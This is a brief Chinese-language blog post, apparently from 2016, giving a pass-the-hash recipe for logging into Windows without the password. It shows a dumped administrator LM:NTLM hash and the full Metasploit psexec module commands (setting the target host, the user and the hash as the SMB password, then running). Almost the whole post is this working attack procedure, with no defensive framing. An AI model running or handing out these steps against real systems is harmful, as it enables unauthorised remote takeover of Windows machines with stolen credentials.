使用Hash直接登录Windows（HASH传递）

抓取windows hash值

得到administrator的hash：

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf调用payload：

use exploit/windows/smb/psexec

show options

set RHOST 192.168.81.129

set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

set SMBUser Administrator

show options

run

posted @ 2016-01-23 17:48 h4ck0ne 阅读(2156) 评论(0) 编辑收藏举报

刷新页面返回顶部

h4ck0ne